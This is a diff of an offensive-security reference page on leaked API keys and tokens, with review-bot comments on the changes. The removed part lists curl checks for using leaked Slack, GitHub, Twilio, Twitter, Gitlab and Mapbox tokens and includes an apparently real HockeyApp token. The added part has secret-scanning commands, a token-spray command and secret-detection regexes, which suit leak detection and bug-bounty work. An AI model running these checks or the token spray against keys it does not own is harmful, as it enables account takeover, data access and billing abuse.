@@ -1,166 +1,89 @@ # API Key and Token Leaks -> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares. +> API keys and tokens are forms of authentication commonly used to manage permissions and access to both public and private services. Leaking these sensitive pieces of data can lead to unauthorized access, compromised security, and potential data breaches. ## Summary - [Tools](#tools) - [Methodology](#exploit) - - [Google Maps](#google-maps) - - [Algolia](#algolia) - - [Slack API Token](#slack-api-token) - - [Facebook Access Token](#facebook-access-token) - - [Github client id and client secret](#github-client-id-and-client-secret) - - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token) - - [Twitter API Secret](#twitter-api-secret) - - [Twitter Bearer Token](#twitter-bearer-token) - - [Gitlab Personal Access Token](#gitlab-personal-access-token) - - [HockeyApp API Token](#hockeyapp-api-token) - - [Mapbox API Token](#mapbox-api-token) + - [Common Causes of Leaks](#common-causes-of-leaks) + - [Validate The API Key](#validate-the-api-key) +- [References](#references) ## Tools +- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets +- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms +- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens +- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. 
- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web - [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid - [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place - ```ps1 - ## Scan a Github Organization - docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity - - ## Scan a GitHub Repository, its Issues and Pull Requests - docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments - - ## Scan a Docker image for verified secrets - docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets - ``` -- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets - [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints ```powershell nuclei -t token-spray/ -var token=token_list.txt ``` -- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms - ```ps1 - python examples/cli.py --url http://example.com/contains_bad_secret.html - python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo - python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE - python ./badsecrets/examples/telerik_knownkey.py --url 
http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx - python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/ - ``` -- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. -- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens ## Methodology -The following commands can be used to takeover accounts or extract personal information from the API using the leaked token. - -### Google Maps - -* [ozguralp/gmapsapiscanner/](https://github.com/ozguralp/gmapsapiscanner/) - Google Maps API Scanner - -| Name | Endpoint | -| --------------------- | --------- | -| Static Maps | [/maps/api/staticmap?key=KEY](https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY) | -| Streetview | [/maps/api/streetview?key=KEY](https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY) | -| Embed | [/maps/embed/v1/place?key=KEY](https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY) | -| Directions | [/maps/api/directions/json?key=KEY](https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY) | -| Geocoding | [/maps/api/geocode/json?key=KEY](https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY) | -| Distance Matrix | 
[/maps/api/distancematrix/json?key=KEY](https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY) | -| Find Place from Text | [/maps/api/place/findplacefromtext/json?key=KEY](https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY) | -| Autocomplete | [/maps/api/place/autocomplete/json?key=KEY](https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY) | -| Elevation | [/maps/api/elevation/json?key=KEY](https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY) | -| Timezone | [/maps/api/timezone/json?key=KEY](https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key=KEY) | -| Roads | [roads.googleapis.com/v1/nearestRoads?key=KEY](https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795&key=KEY) | -| Geolocate | [www.googleapis.com/geolocation/v1/geolocate?key=KEY](https://www.googleapis.com/geolocation/v1/geolocate?key=KEY) | - - -**Impact**: - -* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company -* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account - - -### Algolia - -```powershell -curl --request PUT \ - --url https://-1.algolianet.com/1/indexes//settings \ - --header 
'content-type: application/json' \ - --header 'x-algolia-api-key: ' \ - --header 'x-algolia-application-id: ' \ - --data '{"highlightPreTag": ""}' -``` - - -### Slack API Token - -```powershell -curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1" -``` - - -### Facebook Access Token - -```powershell -curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2 -``` - - -### Github client id and client secret - -```powershell -curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy' -``` - - -### Twilio Account_sid and Auth token - -```powershell -curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN -``` +* **API Keys**: Unique identifiers used to authenticate requests associated with your project or application. +* **Tokens**: Security tokens (like OAuth tokens) that grant access to protected resources. + +### Common Causes of Leaks +* **Hardcoding in Source Code**: Developers may unintentionally leave API keys or tokens directly in the source code. -### Twitter API Secret + ```py + # Example of hardcoded API key + api_key = "1234567890abcdef" + ``` -```powershell -curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' -``` +* **Public Repositories**: Accidentally committing sensitive keys and tokens to publicly accessible version control systems like GitHub. + ```ps1 + ## Scan a Github Organization + docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + + ## Scan a GitHub Repository, its Issues and Pull Requests + docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments + ``` -### Twitter Bearer Token +* **Hardcoding in Docker Images**: API keys and credentials might be hardcoded in Docker images hosted on DockerHub or private registries. 
-```powershell -curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN' -``` + ```ps1 + # Scan a Docker image for verified secrets + docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets + ``` +* **Logs and Debug Information**: Keys and tokens might be inadvertently logged or printed during debugging processes. -### Gitlab Personal Access Token +* **Configuration Files**: Including keys and tokens in publicly accessible configuration files (e.g., .env files, config.json, settings.py, or .aws/credentials.). -```powershell -curl "https://gitlab.example.com/api/v4/projects?private_token=" -``` +### Validate The API Key -### HockeyApp API Token +If assistance is needed in identifying the service that generated the token, [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) can be consulted. It is the largest open-source database for detecting secrets, API keys, passwords, tokens, and more. This database contains regex patterns for various secrets. -```powershell -curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4 +```yaml +patterns: + - pattern: + name: AWS API Gateway + regex: '[0-9a-z]+.execute-api.[0-9a-z._-]+.amazonaws.com' + confidence: low + - pattern: + name: AWS API Key + regex: AKIA[0-9A-Z]{16} + confidence: high ``` +Use [streaak/keyhacks](https://github.com/streaak/keyhacks) or read the documentation of the service to find a quick way to verify the validity of an API key. -### Mapbox API Token - -A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time. 
+* **Example**: Telegram Bot API Token -* Check token validity: - ```ps1 - curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN" - ``` - -* Get list of all tokens associated with an account (only works if the token is a Secret Token (sk), and has the appropriate scope) ```ps1 - curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN" + curl https://api.telegram.org/bot/getMe ```
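Review bot: the Tools list drops `blacklanternsecurity/badsecrets` and `d0ge/sign-saboteur` with no replacement anywhere in the diff, and the trufflehog usage block moves out of the `trufflesecurity/truffleHog` entry into the new Common Causes section, leaving that entry with only its one-line description; keep the two dropped entries (or state in the commit why they go) and add a short pointer from the tool entry to the usage examples that now sit under Public Repositories and Hardcoding in Docker Images. While in this list, the unchanged `momenbasel/KeyFinder` line reads "a tool that let you find keys"; it should be "lets".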
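Review bot: the whole per-service Methodology section is deleted (the Google Maps endpoint table with its Impact notes, and the validity checks for Algolia, Slack `auth.test`, the Facebook access-token debugger, GitHub client id/secret, Twilio, Twitter, Gitlab, HockeyApp and Mapbox `tokens/v2`, including the `sk`/`pk`/`tk` Mapbox distinction), while the replacement only links to `streaak/keyhacks` and adds a single Telegram example, so readers lose the concrete checks and the impact statement for a leaked Maps key; either keep a compact table of the commonly met services with their check endpoint, or state explicitly that keyhacks is now the maintained home for them. Removing the HockeyApp line is right in any case: it embedded what looks like a real token value instead of a placeholder.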
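Review bot: in the new Validate The API Key section the Telegram example `curl https://api.telegram.org/bot/getMe` has no token placeholder between `bot` and `/getMe` (if it was written as `<TOKEN>` the angle brackets were swallowed in rendering, as they were in the Algolia `--url https://-1.algolianet.com/1/indexes//settings` lines); use the `TOKEN_HERE` convention this file already uses, e.g. `curl "https://api.telegram.org/botTOKEN_HERE/getMe"`. In the quoted secrets-patterns-db YAML the `AWS API Gateway` regex `[0-9a-z]+.execute-api.[0-9a-z._-]+.amazonaws.com` leaves its dots unescaped so each matches any character; if it is copied verbatim from upstream say so, otherwise escape them. Minor: the stray `.` inside `(... or .aws/credentials.)`, and a blank line is missing between the closing YAML fence and the `Use [streaak/keyhacks]` paragraph.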